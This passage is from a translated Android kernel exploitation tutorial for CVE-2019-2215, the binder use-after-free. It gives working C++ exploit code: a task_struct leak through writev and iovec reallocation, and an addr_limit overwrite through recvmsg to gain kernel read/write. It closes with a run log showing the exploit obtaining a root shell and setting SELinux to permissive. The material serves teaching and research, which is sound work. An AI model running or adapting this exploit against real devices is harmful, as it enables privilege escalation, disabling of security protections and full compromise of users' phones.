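The body of mmap4gbAlignedPage() is not shown in this article, so the following is only a hypothetical sketch of one way to obtain such a page: it passes 4 GiB-aligned hint addresses to mmap() (without MAP_FIXED, so existing mappings are never replaced) and keeps the first mapping whose low 32 bits are zero. For comparison, the sample run later in this article maps its page at 0x100000000.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

#define FOUR_GB 0x100000000ULL

/* Hypothetical helper: try 4 GiB-aligned hints (no MAP_FIXED, so nothing
 * already mapped is replaced) and keep the first mapping whose low 32 bits
 * are zero. Returns MAP_FAILED if no hint was honoured. */
static void *map_4gb_aligned_page(size_t len)
{
    for (uint64_t k = 1; k <= 16; k++) {
        void *hint = (void *)(uintptr_t)(k * FOUR_GB);
        void *p = mmap(hint, len, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (p == MAP_FAILED)
            continue;
        /* Low 32 bits zero: the overlapping spinlock reads as unlocked */
        if (((uintptr_t)p & 0xFFFFFFFFu) == 0)
            return p;
        munmap(p, len); /* hint not honoured, try the next candidate */
    }
    return MAP_FAILED;
}
```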

Note: To make effective use of the blocking behavior of writev, we need at least two lightweight processes.

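Let's lay out the attack plan for leaking the task_struct pointer:

Parent process:

· Create a pipe, get its file descriptors and set its maximum buffer size to PAGE_SIZE

· Link the eventpoll wait queue to the binder_thread wait queue

· fork the process

· Free the binder_thread structure

· Call writev, which reallocates the freed chunk as the iovec array, and stay blocked

· Once writev resumes, it processes iovecStack[11], which has been clobbered by the unlink operation

· Read the task_struct pointer from the leaked kernel-space chunk

Child process:

· sleep to avoid a race condition

· Trigger the unlink operation

· Read from the pipe the dummy data written by processing iovecStack[10]; this resumes the writev system call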
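The blocking mechanics this plan relies on can be tried without binder at all. The sketch below reproduces only the writev part: the pipe is shrunk to one page, so writev() copies the first iovec and then blocks on the second until the child drains the pipe. It assumes 4 KiB pages (as on the x86_64 target) and Linux's F_SETPIPE_SZ; there is no corruption here, so the second iovec simply delivers its own 'B' bytes instead of leaked kernel memory.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ 1031 /* F_LINUX_SPECIFIC_BASE + 7 */
#endif

#define CHUNK 4096 /* assumes 4 KiB pages, as on the x86_64 target */

/* writev() of two one-page iovecs into a one-page pipe: the first page fills
 * the pipe, then writev() blocks until the child reads it. Returns writev()'s
 * result (expected 2 * CHUNK) and stores the first byte the parent reads
 * afterwards in *after, or returns -1 on error. */
static ssize_t writev_block_and_resume(char *after)
{
    static char a[CHUNK], b[CHUNK], sink[CHUNK];
    int fds[2];

    if (pipe(fds) == -1)
        return -1;
    if (fcntl(fds[0], F_SETPIPE_SZ, CHUNK) == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    memset(a, 'A', sizeof(a));
    memset(b, 'B', sizeof(b));
    struct iovec iov[2] = {
        { .iov_base = a, .iov_len = sizeof(a) }, /* role of iovecStack[10] */
        { .iov_base = b, .iov_len = sizeof(b) }, /* role of iovecStack[11] */
    };

    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        usleep(200 * 1000); /* give the parent time to block in writev() */
        ssize_t n = read(fds[0], sink, sizeof(sink)); /* drains page 1 */
        _exit(n == CHUNK && sink[0] == 'A' ? 0 : 1);
    }

    ssize_t written = writev(fds[1], iov, 2); /* blocks after page 1 */
    ssize_t n = read(fds[0], sink, sizeof(sink));
    *after = n > 0 ? sink[0] : 0;

    int status = 0;
    waitpid(pid, &status, 0);
    close(fds[0]);
    close(fds[1]);
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;
    return written;
}
```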

To better understand the exploit flow, see the diagram created by Maddie Stone in the Project Zero blog post, which depicts it very accurately.

Now let's see how to implement the exploit code.

void BinderUaF::leakTaskStruct() {
    int pipe_fd[2] = {0};
    ssize_t nBytesRead = 0;
    static char dataBuffer[PAGE_SIZE] = {0};
    struct iovec iovecStack[IOVEC_COUNT] = {nullptr};

    //
    // Get binder fd
    //
    setupBinder();

    //
    // Create event poll
    //
    setupEventPoll();

    //
    // We are going to use iovec for scoped read/write,
    // we need to make sure that iovec stays in the kernel
    // before we trigger the unlink after binder_thread has
    // been freed.
    //
    // One way to achieve this is by using the blocking APIs
    // in Linux kernel. Such APIs are read, write, etc on pipe.
    //

    //
    // Setup pipe for iovec
    //
    INFO("[+] Setting up pipe\n");

    if (pipe(pipe_fd) == -1) {
        ERR("\t[-] Unable to create pipe\n");
        exit(EXIT_FAILURE);
    } else {
        INFO("\t[*] Pipe created successfully\n");
    }

    //
    // pipe_fd[0] = read fd
    // pipe_fd[1] = write fd
    //
    // Default size of pipe is 65536 = 0x10000 = 64KB
    // This is way more data than we care about
    // Let's reduce the size of pipe to 0x1000
    //
    if (fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_SIZE) == -1) {
        ERR("\t[-] Unable to change the pipe capacity\n");
        exit(EXIT_FAILURE);
    } else {
        INFO("\t[*] Changed the pipe capacity to: 0x%x\n", PAGE_SIZE);
    }

    INFO("[+] Setting up iovecs\n");

    //
    // As we are overlapping binder_thread with iovec,
    // binder_thread->wait.lock will align to iovecStack[10].iov_base.
    //
    // If binder_thread->wait.lock is not 0 then the thread will get
    // stuck in trying to acquire the lock and the unlink operation
    // will not happen.
    //
    // To avoid this, we need to make sure that the overlapped data
    // should be set to 0.
    //
    // iovec.iov_base is a 64bit value, and spinlock_t is 32bit, so if
    // we can pass a valid memory address whose lower 32bit value is 0,
    // then we can avoid spin lock issue.
    //
    mmap4gbAlignedPage();

    iovecStack[IOVEC_WQ_INDEX].iov_base = m_4gb_aligned_page;
    iovecStack[IOVEC_WQ_INDEX].iov_len = PAGE_SIZE;
    iovecStack[IOVEC_WQ_INDEX + 1].iov_base = (void *) 0x41414141;
    iovecStack[IOVEC_WQ_INDEX + 1].iov_len = PAGE_SIZE;

    //
    // Now link the poll wait queue to binder thread wait queue
    //
    linkEventPollWaitQueueToBinderThreadWaitQueue();

    //
    // We should trigger the unlink operation when we
    // have the binder_thread reallocated as iovec array
    //

    //
    // Now fork
    //
    pid_t childPid = fork();

    if (childPid == 0) {
        //
        // child process
        //

        //
        // There is a race window between the unlink and blocking
        // in writev, so sleep for a while to ensure that we are
        // blocking in writev before the unlink happens
        //
        sleep(2);

        //
        // Trigger the unlink operation on the reallocated chunk
        //
        unlinkEventPollWaitQueueFromBinderThreadWaitQueue();

        //
        // First interesting iovec will read 0x1000 bytes of data.
        // This is just the junk data that we are not interested in
        //
        nBytesRead = read(pipe_fd[0], dataBuffer, sizeof(dataBuffer));

        if (nBytesRead != PAGE_SIZE) {
            ERR("\t[-] CHILD: read failed. nBytesRead: 0x%lx, expected: 0x%x\n", nBytesRead, PAGE_SIZE);
            exit(EXIT_FAILURE);
        }

        exit(EXIT_SUCCESS);
    }

    //
    // parent process
    //

    //
    // I have seen some races which hinder the reallocation.
    // So, now freeing the binder_thread after fork.
    //
    freeBinderThread();

    //
    // Reallocate binder_thread as iovec array
    //
    // We need to make sure this writev call blocks
    // This will only happen when the pipe is already full
    //

    //
    // This print statement was ruining the reallocation,
    // spent a night to figure this out. Commenting the
    // below line.
    //
    // INFO("[+] Reallocating binder_thread\n");

    ssize_t nBytesWritten = writev(pipe_fd[1], iovecStack, IOVEC_COUNT);

    //
    // If the corruption was successful, the total bytes written
    // should be equal to 0x2000. This is because there are two
    // valid iovec and the length of each is 0x1000
    //
    if (nBytesWritten != PAGE_SIZE * 2) {
        ERR("\t[-] writev failed. nBytesWritten: 0x%lx, expected: 0x%x\n", nBytesWritten, PAGE_SIZE * 2);
        exit(EXIT_FAILURE);
    } else {
        INFO("\t[*] Wrote 0x%lx bytes\n", nBytesWritten);
    }

    //
    // Now read the actual data from the corrupted iovec
    // This is the leaked data from kernel address space
    // and will contain the task_struct pointer
    //
    nBytesRead = read(pipe_fd[0], dataBuffer, sizeof(dataBuffer));

    if (nBytesRead != PAGE_SIZE) {
        ERR("\t[-] read failed. nBytesRead: 0x%lx, expected: 0x%x\n", nBytesRead, PAGE_SIZE);
        exit(EXIT_FAILURE);
    }

    //
    // Wait for the child process to exit
    //
    wait(nullptr);

    m_task_struct = (struct task_struct *) *((int64_t *) (dataBuffer + TASK_STRUCT_OFFSET_IN_LEAKED_DATA));
    m_pidAddress = (void *) ((int8_t *) m_task_struct + offsetof(struct task_struct, pid));
    m_credAddress = (void *) ((int8_t *) m_task_struct + offsetof(struct task_struct, cred));
    m_nsproxyAddress = (void *) ((int8_t *) m_task_struct + offsetof(struct task_struct, nsproxy));

    INFO("[+] Leaked task_struct: %p\n", m_task_struct);
    INFO("\t[*] &task_struct->pid: %p\n", m_pidAddress);
    INFO("\t[*] &task_struct->cred: %p\n", m_credAddress);
    INFO("\t[*] &task_struct->nsproxy: %p\n", m_nsproxyAddress);
}

I hope you now have a better idea of how we leaked the task_struct pointer using the iovec structure.
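TASK_STRUCT_OFFSET_IN_LEAKED_DATA is not defined in the listing above. A sketch of how it can be derived, assuming the leak starts at &binder_thread->wait.head (chunk + 0xA8, per the overlap analysis earlier) and that task is the last member of the 408-byte binder_thread (chunk + 0x190): the pointer sits 0xE8 bytes into the leaked page. The sketch also reads it with memcpy() instead of the *(int64_t *) cast, which avoids unaligned-access and strict-aliasing issues. The task_struct field offsets are taken from the sample run later in this article and are specific to that kernel build.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed layout: the leak starts at &binder_thread->wait.head and task
 * is binder_thread's last member. */
#define LEAK_START_IN_CHUNK 0xA8  /* wait (0xA0) + 8 */
#define TASK_PTR_IN_CHUNK   0x190 /* 408 - 8 = 400 */
#define TASK_PTR_IN_LEAK    (TASK_PTR_IN_CHUNK - LEAK_START_IN_CHUNK) /* 0xE8 */

/* task_struct field offsets observed in this article's sample run;
 * they are specific to that kernel build. */
#define TASK_PID_OFF     0x4e8
#define TASK_CRED_OFF    0x688
#define TASK_NSPROXY_OFF 0x6c0

/* Reads a 64-bit value at `off` without an unaligned pointer cast. */
static uint64_t leaked_u64(const unsigned char *leak, size_t off)
{
    uint64_t v;
    memcpy(&v, leak + off, sizeof(v));
    return v;
}
```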

Clobbering addr_limit

We have leaked the task_struct pointer; now it's time to clobber mm_segment_t addr_limit.

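We cannot use writev here, because this time we do not want a scoped read of kernel memory but a scoped write into kernel space. I first tried to achieve the scoped write with the blocking behavior of readv, but ran into some issues that made readv unusable.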

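Here are the reasons:

readv on a pipe does not process one iovec and then block the way writev does.

When iovecStack[10].iov_len is clobbered with a pointer, the length becomes a very large number, and when copy_page_to_iter_iovec copies data by walking the iovec array, the copy goes wrong.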

Let's open workshop/android-4.14-dev/goldfish/lib/iov_iter.c and look at the implementation of copy_page_to_iter_iovec.

static size_t copy_page_to_iter_iovec(struct page *page, size_t offset, size_t bytes,
                                      struct iov_iter *i)
{
    size_t skip, copy, left, wanted;
    const struct iovec *iov;
    char __user *buf;
    void *kaddr, *from;

    [...]

    while (unlikely(!left && bytes)) {
        iov++;
        buf = iov->iov_base;
        copy = min(bytes, iov->iov_len);
        left = copyout(buf, from, copy);
        [...]
    }

    [...]

    return wanted - bytes;
}

· When it processes the clobbered iovecStack[10], it computes the copy length on the line copy = min(bytes, iov->iov_len)

· bytes is the sum of the lengths of all iovecs, and iov->iov_len is iovecStack[10].iov_len, which has been clobbered with a pointer, i.e. a very large number

· This is where it breaks: copy becomes bytes, and the function never processes iovecStack[11], the iovec that would have given us the scoped write
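The failure mode can be reproduced with a simplified model of the copy loop, in which each iovec receives min(bytes, iov_len). The lengths 1, 0x20 and 0x8 are borrowed from the recvmsg layout used later; the helper is hypothetical and ignores page boundaries and faults. With an intact array the 41 bytes are split as intended, but once the first length is replaced by an example kernel pointer, everything lands in the first iovec and the following iovecs receive nothing.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified copy loop: each iovec receives min(bytes, iov_len) and the
 * remainder moves on to the next one. got[i] = bytes given to iovec i. */
static void distribute(const size_t *iov_len, size_t n, size_t bytes, size_t *got)
{
    for (size_t i = 0; i < n; i++) {
        size_t copy = bytes < iov_len[i] ? bytes : iov_len[i];
        got[i] = copy;
        bytes -= copy;
    }
}
```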

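To achieve the scoped write, we use the recvmsg system call and make it block by passing MSG_WAITALL as its flags argument. recvmsg blocks just like writev and does not suffer from the problem we discussed for readv.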

Let's see what we want to write into the addr_limit field.

gef> p sizeof(mm_segment_t)
$17 = 0x8

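Since mm_segment_t is 0x8 bytes, we want to clobber it with 0xFFFFFFFFFFFFFFFE: this value still lets access_ok accept practically the entire kernel address space, yet it is not equal to KERNEL_DS, so the do_page_fault check on arm64 will not crash the process.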

Now let's see how the binder_thread chunk overlaps the iovec array in this case.

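iovecStack[10].iov_len and iovecStack[11].iov_base will be clobbered with a pointer. However, we trigger the unlink operation only after recvmsg has already processed iovecStack[10] and the system call is blocked waiting to receive the rest of the message.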

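Once the unlink operation is done, we write the rest of the data (finalSocketData) to the socket file descriptor, and the recvmsg system call resumes automatically.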

static uint64_t finalSocketData[] = {
    0x1,                    // iovecStack[IOVEC_WQ_INDEX].iov_len
    0x41414141,             // iovecStack[IOVEC_WQ_INDEX + 1].iov_base
    0x8 + 0x8 + 0x8 + 0x8,  // iovecStack[IOVEC_WQ_INDEX + 1].iov_len
    (uint64_t) ((uint8_t *) m_task_struct +
                OFFSET_TASK_STRUCT_ADDR_LIMIT), // iovecStack[IOVEC_WQ_INDEX + 2].iov_base
    0xFFFFFFFFFFFFFFFE      // addr_limit value
};

Let's see what happens after the corruption:

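· iovecStack[10] has already been processed before the unlink operation is triggered

· iovecStack[10].iov_len and iovecStack[11].iov_base are overwritten with a pointer to binder_thread->wait.head, which is the address of iovecStack[10].iov_len itself

· When recvmsg starts processing iovecStack[11], it writes 0x20 bytes starting at iovecStack[10].iov_len:

  · 0x1 into iovecStack[10].iov_len

  · 0x41414141 into iovecStack[11].iov_base

  · 0x20 into iovecStack[11].iov_len

  · the address of addr_limit into iovecStack[12].iov_base

· When recvmsg then processes iovecStack[12]:

  · it writes 0xFFFFFFFFFFFFFFFE into addr_limit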

This is how we turn the scoped write into a controlled arbitrary write.
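The whole chain can be replayed in user space to check the data layout. In this sketch a local struct iovec array stands in for the reallocated chunk, a local uint64_t stands in for addr_limit, and the loop mimics recvmsg reading each iov_base/iov_len before copying into it; nothing here touches the kernel, and all names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/uio.h>

#define IOVEC_COUNT_SIM 25
#define WQ_INDEX        10

/* Replays the recvmsg-based clobber in user space and returns the final
 * value of the fake addr_limit. */
static uint64_t simulate_addr_limit_clobber(void)
{
    struct iovec iov[IOVEC_COUNT_SIM];            /* plays the reallocated chunk */
    unsigned char page[1];                        /* plays m_4gb_aligned_page */
    uint64_t fake_addr_limit = 0x7ffffffff000ULL; /* plays addr_limit */

    memset(iov, 0, sizeof(iov));
    iov[WQ_INDEX].iov_base = page;
    iov[WQ_INDEX].iov_len = 1;
    iov[WQ_INDEX + 1].iov_base = (void *)0x41414141;
    iov[WQ_INDEX + 1].iov_len = 0x20;
    iov[WQ_INDEX + 2].iov_base = (void *)0x42424242;
    iov[WQ_INDEX + 2].iov_len = 0x8;

    /* recvmsg already copied the junk byte into iov[10], then blocked */
    page[0] = 0x41;

    /* Unlink: &wait.head (chunk + 0xA8 == &iov[10].iov_len) is written into
     * wait.head.next (iov[10].iov_len) and wait.head.prev (iov[11].iov_base) */
    void *wait_head = (unsigned char *)iov + WQ_INDEX * sizeof(struct iovec)
                      + offsetof(struct iovec, iov_len);
    iov[WQ_INDEX].iov_len = (size_t)(uintptr_t)wait_head;
    iov[WQ_INDEX + 1].iov_base = wait_head;

    const uint64_t final_data[] = {
        0x1, 0x41414141, 0x20,
        (uint64_t)(uintptr_t)&fake_addr_limit,
        0xFFFFFFFFFFFFFFFEULL,
    };
    const unsigned char *src = (const unsigned char *)final_data;
    size_t remaining = sizeof(final_data);

    /* recvmsg resumes at iov[11]; each iovec's base/len is read before copying */
    for (size_t i = WQ_INDEX + 1; i < IOVEC_COUNT_SIM && remaining > 0; i++) {
        void *base = iov[i].iov_base;
        size_t len = iov[i].iov_len;
        size_t copy = len < remaining ? len : remaining;
        memcpy(base, src, copy);
        src += copy;
        remaining -= copy;
    }
    return fake_addr_limit;
}
```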

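Let's lay out the plan for clobbering addr_limit:

Parent process:

· Create a socketpair and get its file descriptors

· Write 0x1 byte of junk data to the socket's write descriptor

· Link the eventpoll wait queue to the binder_thread wait queue

· fork the process

· Free the binder_thread structure

· Call recvmsg, which reallocates the freed chunk as the iovec array, consumes the 0x1 byte of junk data, then blocks waiting for the rest of the data

· Once recvmsg resumes, it processes iovecStack[11], which has been clobbered by the unlink operation

· When recvmsg returns, addr_limit has been clobbered

Child process:

· sleep to avoid a race condition

· Trigger the unlink operation

· Write the rest of the data, finalSocketData, to the socket's write descriptor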
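As with writev, the recvmsg blocking behavior can be observed on its own. The following sketch uses the same 1 + 0x20 + 0x8 byte iovec layout without binder: one junk byte is queued first, recvmsg(MSG_WAITALL) fills the first iovec and then waits until the child sends the remaining 40 bytes. The helper name is hypothetical.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

/* recvmsg(MSG_WAITALL) over a 1 + 0x20 + 0x8 byte iovec layout: one junk
 * byte is queued up front, the child sends the other 40 bytes later.
 * Returns recvmsg()'s result (expected 41), or -1 on error. */
static ssize_t recvmsg_waitall_demo(void)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1)
        return -1;

    char junk = 0x41;
    if (write(sv[1], &junk, 1) != 1)
        return -1;

    char first[1], second[0x20], third[0x8];
    struct iovec iov[3] = {
        { .iov_base = first,  .iov_len = sizeof(first)  },
        { .iov_base = second, .iov_len = sizeof(second) },
        { .iov_base = third,  .iov_len = sizeof(third)  },
    };
    struct msghdr msg;
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char rest[sizeof(second) + sizeof(third)];
        memset(rest, 0x42, sizeof(rest));
        usleep(200 * 1000); /* parent should be blocked in recvmsg() by now */
        _exit(write(sv[1], rest, sizeof(rest)) == (ssize_t)sizeof(rest) ? 0 : 1);
    }

    /* Copies the junk byte into first[], then waits for the remaining 40 */
    ssize_t n = recvmsg(sv[0], &msg, MSG_WAITALL);

    int status = 0;
    waitpid(pid, &status, 0);
    close(sv[0]);
    close(sv[1]);
    return n;
}
```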

Now let's see how this is implemented in the exploit code:

void BinderUaF::clobberAddrLimit() {
    int sock_fd[2] = {0};
    ssize_t nBytesWritten = 0;
    struct msghdr message = {nullptr};
    struct iovec iovecStack[IOVEC_COUNT] = {nullptr};

    //
    // Get binder fd
    //
    setupBinder();

    //
    // Create event poll
    //
    setupEventPoll();

    //
    // For clobbering the addr_limit we trigger the unlink
    // operation again after reallocating binder_thread with
    // iovecs
    //
    // We managed to leak kernel data by using the blocking
    // feature of writev
    //
    // We could use readv blocking feature to do scoped write
    // However, after trying readv and reading the Linux kernel
    // code, I figured out an issue which makes readv useless for
    // current bug.
    //
    // The main issue that I found is:
    //
    // iovecStack[IOVEC_WQ_INDEX].iov_len is clobbered with a pointer
    // due to unlink operation
    //
    // So, when copy_page_to_iter_iovec tries to process the iovecs,
    // there is a line of code, copy = min(bytes, iov->iov_len);
    // Here, "bytes" is equal to sum of all iovecs length and as
    // "iov->iov_len" is corrupted with a pointer which is obviously
    // a very big number, now copy = sum of all iovecs length and skips
    // the processing of the next iovec which is the target iovec which
    // would give us scoped write.
    //
    // I believe P0 also faced the same issue so they switched to recvmsg
    //

    //
    // Setup socketpair for iovec
    //
    // AF_UNIX/AF_LOCAL is used because we are interested only in
    // local communication
    //
    // We use SOCK_STREAM so that MSG_WAITALL can be used in recvmsg
    //
    INFO("[+] Setting up socket\n");

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sock_fd) == -1) {
        ERR("\t[-] Unable to create socketpair\n");
        exit(EXIT_FAILURE);
    } else {
        INFO("\t[*] Socketpair created successfully\n");
    }

    //
    // We will just write junk data to socket so that when recvmsg
    // is called it processes the first valid iovec with this junk data
    // and then blocks and waits for the rest of the data to be received
    //
    static char junkSocketData[] = {
        0x41
    };

    INFO("[+] Writing junk data to socket\n");

    nBytesWritten = write(sock_fd[1], &junkSocketData, sizeof(junkSocketData));

    if (nBytesWritten != sizeof(junkSocketData)) {
        ERR("\t[-] write failed. nBytesWritten: 0x%lx, expected: 0x%lx\n", nBytesWritten, sizeof(junkSocketData));
        exit(EXIT_FAILURE);
    }

    INFO("[+] Setting up iovecs\n");

    //
    // We want to block after processing the iovec at IOVEC_WQ_INDEX,
    // because then, we can trigger the unlink operation and get the
    // next iovecs corrupted to gain scoped write.
    //
    mmap4gbAlignedPage();

    iovecStack[IOVEC_WQ_INDEX].iov_base = m_4gb_aligned_page;
    iovecStack[IOVEC_WQ_INDEX].iov_len = 1;
    iovecStack[IOVEC_WQ_INDEX + 1].iov_base = (void *) 0x41414141;
    iovecStack[IOVEC_WQ_INDEX + 1].iov_len = 0x8 + 0x8 + 0x8 + 0x8;
    iovecStack[IOVEC_WQ_INDEX + 2].iov_base = (void *) 0x42424242;
    iovecStack[IOVEC_WQ_INDEX + 2].iov_len = 0x8;

    //
    // Prepare the data buffer that will be written to socket
    //

    //
    // Setting addr_limit to 0xFFFFFFFFFFFFFFFF in arm64
    // will result in crash because of a check in do_page_fault
    // However, x86_64 does not have this check. But it's better
    // to set it to 0xFFFFFFFFFFFFFFFE so that this same code can
    // be used in arm64 as well.
    //
    static uint64_t finalSocketData[] = {
        0x1,                    // iovecStack[IOVEC_WQ_INDEX].iov_len
        0x41414141,             // iovecStack[IOVEC_WQ_INDEX + 1].iov_base
        0x8 + 0x8 + 0x8 + 0x8,  // iovecStack[IOVEC_WQ_INDEX + 1].iov_len
        (uint64_t) ((uint8_t *) m_task_struct +
                    OFFSET_TASK_STRUCT_ADDR_LIMIT), // iovecStack[IOVEC_WQ_INDEX + 2].iov_base
        0xFFFFFFFFFFFFFFFE      // addr_limit value
    };

    //
    // Prepare the message
    //
    message.msg_iov = iovecStack;
    message.msg_iovlen = IOVEC_COUNT;

    //
    // Now link the poll wait queue to binder thread wait queue
    //
    linkEventPollWaitQueueToBinderThreadWaitQueue();

    //
    // We should trigger the unlink operation when we
    // have the binder_thread reallocated as iovec array
    //

    //
    // Now fork
    //
    pid_t childPid = fork();

    if (childPid == 0) {
        //
        // child process
        //

        //
        // There is a race window between the unlink and blocking
        // in recvmsg, so sleep for a while to ensure that we are
        // blocking in recvmsg before the unlink happens
        //
        sleep(2);

        //
        // Trigger the unlink operation on the reallocated chunk
        //
        unlinkEventPollWaitQueueFromBinderThreadWaitQueue();

        //
        // Now, at this point, the iovecStack[IOVEC_WQ_INDEX].iov_len
        // and iovecStack[IOVEC_WQ_INDEX + 1].iov_base is clobbered
        //
        // Write rest of the data to the socket so that recvmsg starts
        // processing the corrupted iovecs and we get scoped write and
        // finally arbitrary write
        //
        nBytesWritten = write(sock_fd[1], finalSocketData, sizeof(finalSocketData));

        if (nBytesWritten != sizeof(finalSocketData)) {
            ERR("\t[-] write failed. nBytesWritten: 0x%lx, expected: 0x%lx\n", nBytesWritten, sizeof(finalSocketData));
            exit(EXIT_FAILURE);
        }

        exit(EXIT_SUCCESS);
    }

    //
    // parent process
    //

    //
    // I have seen some races which hinder the reallocation.
    // So, now freeing the binder_thread after fork.
    //
    freeBinderThread();

    //
    // Reallocate binder_thread as iovec array and
    // we need to make sure this recvmsg call blocks.
    //
    // recvmsg will block after processing a valid iovec at
    // iovecStack[IOVEC_WQ_INDEX]
    //
    ssize_t nBytesReceived = recvmsg(sock_fd[0], &message, MSG_WAITALL);

    //
    // If the corruption was successful, the total bytes received
    // should be equal to length of all iovec. This is because there
    // are three valid iovec
    //
    ssize_t expectedBytesReceived = iovecStack[IOVEC_WQ_INDEX].iov_len +
                                    iovecStack[IOVEC_WQ_INDEX + 1].iov_len +
                                    iovecStack[IOVEC_WQ_INDEX + 2].iov_len;

    if (nBytesReceived != expectedBytesReceived) {
        ERR("\t[-] recvmsg failed. nBytesReceived: 0x%lx, expected: 0x%lx\n", nBytesReceived, expectedBytesReceived);
        exit(EXIT_FAILURE);
    }

    //
    // Wait for the child process to exit
    //
    wait(nullptr);
}

Exploit Verification

Let's see the exploit in action:

ashfaq@hacksys:~/workshop$ adb shell
generic_x86_64:/ $ uname -a
Linux localhost 4.14.150+ #1 repo:q-goldfish-android-goldfish-4.14-dev SMP PREEMPT Tue Apr x86_64
generic_x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
generic_x86_64:/ $ getenforce
Enforcing
generic_x86_64:/ $ cd /data/local/tmp
generic_x86_64:/data/local/tmp $ ./cve-2019-2215-exploit

@HackSysTeam

[+] Binding to 0th core
[+] Opening: /dev/binder
    [*] m_binder_fd: 0x3
[+] Creating event poll
    [*] m_epoll_fd: 0x4
[+] Setting up pipe
    [*] Pipe created successfully
    [*] Changed the pipe capacity to: 0x1000
[+] Setting up iovecs
[+] Mapping 4GB aligned page
    [*] Mapped page: 0x100000000
[+] Linking eppoll_entry->wait.entry to binder_thread->wait.head
[+] Freeing binder_thread
[+] Un-linking eppoll_entry->wait.entry from binder_thread->wait.head
    [*] Wrote 0x2000 bytes
[+] Leaked task_struct: 0xffff888063a14b00
    [*] &task_struct->pid: 0xffff888063a14fe8
    [*] &task_struct->cred: 0xffff888063a15188
    [*] &task_struct->nsproxy: 0xffff888063a151c0
[+] Opening: /dev/binder
    [*] m_binder_fd: 0x7
[+] Creating event poll
    [*] m_epoll_fd: 0x8
[+] Setting up socket
    [*] Socketpair created successfully
[+] Writing junk data to socket
[+] Setting up iovecs
[+] Linking eppoll_entry->wait.entry to binder_thread->wait.head
[+] Freeing binder_thread
[+] Un-linking eppoll_entry->wait.entry from binder_thread->wait.head
[+] Setting up pipe for kernel read/write
    [*] Pipe created successfully
[+] Verifying arbitrary read/write primitive
    [*] currentPid: 7039
    [*] expectedPid: 7039
    [*] Arbitrary read/write successful
[+] Patching current task cred members
    [*] cred: 0xffff888066e016c0
[+] Verifying if selinux enforcing is enabled
    [*] nsproxy: 0xffffffff81433ac0
    [*] Kernel base: 0xffffffff80200000
    [*] selinux_enforcing: 0xffffffff816acfe8
    [*] selinux enforcing is enabled
    [*] Disabled selinux enforcing
[+] Verifying if rooted
    [*] uid: 0x0
    [*] Rooting successful
[+] Spawning root shell
generic_x86_64:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
generic_x86_64:/data/local/tmp # getenforce
Permissive
generic_x86_64:/data/local/tmp #

As you can see, we have obtained root and disabled SELinux (getenforce now reports Permissive).

0x03 References

Linux lightweight processes

· https://zh.wikipedia.org/wiki/轻量级过程

· https://medium.com/hungys-blog/linux-kernel-process-99629d91423c

SELinux

· https://source.android.com/security/selinux

· https://www.redhat.com/zh-CN/topics/linux/what-is-selinux

seccomp

· https://lwn.net/Articles/656307/

Building the kernel

· https://source.android.com/setup/build/building-kernels

· https://android.googlesource.com/kernel/manifest

Linux kernel source cross-referencer

· https://elixir.bootlin.com/linux/v4.14.171/source

Linux kernel source code

CVE-2019-2215 bug reports

· https://groups.google.com/d/msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ

· https://bugs.chromium.org/p/project-zero/issues/detail?id=1942

Vectored I/O

· https://zh.wikipedia.org/wiki/Vectored_I/O

· https://www.gnu.org/software/libc/manual/html_node/Scatter_002dGather.html

· http://man7.org/linux/man-pages/man2/readv.2.html

Exploit development

· https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html

· https://www.youtube.com/watch?v=TAwQ4ezgEIo

· https://dayzerosec.com/posts/analyzing-androids-cve-2019-2215-dev-binder-uaf/

· https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/

This article is translated from: https://cloudfuzz.github.io/android-kernel-exploitation/
